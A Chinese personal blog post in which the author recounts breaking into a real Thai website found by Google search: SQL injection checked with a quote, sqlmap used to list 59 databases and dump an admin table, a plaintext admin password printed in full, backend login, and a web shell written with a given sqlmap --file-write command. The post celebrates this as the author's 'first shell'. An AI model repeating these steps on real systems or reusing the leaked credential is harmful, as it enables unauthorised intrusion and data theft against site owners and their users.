昔日

记日某泰国站

kongmo



最近在练习注入(手工加sqlmap)

然后用谷歌语法找到了个站,是google第一条


找到站点之后就首先判断是否可以注入

加单引号  直接爆出路径

这是人品爆发吗(人品终于爆发了一次)


想着先拿sqlmap跑一下试试

然后就真的可以   


跑出来的表有跟多,一共有59个

available databases [59]
[*] albaba_delivery
[*] alibabaregis_bbl
[*] alibabaresearch
[*] amazonresearch
[*] bbpooldb12
[*] bddelivery
[*] bdresearch
[*] bkk71_forum
[*] career_db
[*] careers
[*] cb_db
[*] cma_db
[*] cmc
[*] countertourdb
[*] dropshipresearch
[*] ebay_forum
[*] ebayr_bbl
[*] ebayresearch
[*] ebayresearchcm
[*] ecemarket_db
[*] ecemarket_test
[*] ecepost
[*] ecetopics
[*] fbdelivery
[*] fbresearch
[*] haccess_test
[*] hdaaccess
[*] information_schema
[*] lapayaset
[*] linkfitness_db
[*] map_tes
[*] mflexdb1
[*] mysql
[*] nova_db2
[*] npc_db
[*] ob_board__test_db
[*] ob_board_db
[*] obilis_tmp_db
[*] onlmktresearch
[*] photohut_db
[*] photohut_test
[*] phpmyadmin
[*] pretest
[*] promasscomm_db
[*] punsuay
[*] shopnshare
[*] sweetheart_db
[*] sweetheart_forum
[*] sweetheart_uk
[*] taobaoresearch
[*] test
[*] thaioven_test
[*] thaoven_db
[*] video_free_db
[*] video_member_db
[*] wiseboard_db
[*] wrapit_db
[*] youtuberesearch
[*] ytdelivery



接着用sqlmap 查看当前用户为root@localhost

当前数据库为ecepost


接着就是查裤子咯

Database: ecepost
[4 tables]
+-------------+
| tbads       |
| tbadsowner  |
| tbtopic_ads |
| tbtopics    |
+-------------+


有四个表


初步一看   并没有哪个直接是很明显的管理表的


就试试

tbadsowner

这个表


这个表里面有个列很特别  

那是isadmin ( 就是判断直接是否是管理)

接着就直接把400多条数据直接dump下来了


就只有一个是管理

wiSeT1974_i;pq


密码倒是比较好的  

然而  确实明文保存的


在这里  因为这个泰国站

username  里面是泰文  我试试等后台试试  不行

接着试了试id作为用户名  就是一串数字

竟然可以


进去之后 

找上传   然而过滤掉了   


我请教了大牛   他教我直接写shell上去


我用sqlmap试了试   

参数是--os-shell

然而发现并不行


接着让我找下

--file-write这个参数的使用   


我研究了下

python sqlmap.py -u "注入点" --file-write 本机绝对路径 -e-dest 服务器的绝对路径


然后就写进去了 

就拿到shell了   

发现这是台虚拟主机   暂时还没有继续挖了

记录下  这是我的第一条shell




评论

热度(1)

  1. 昔日kongmo 转载了此文字
    kongmo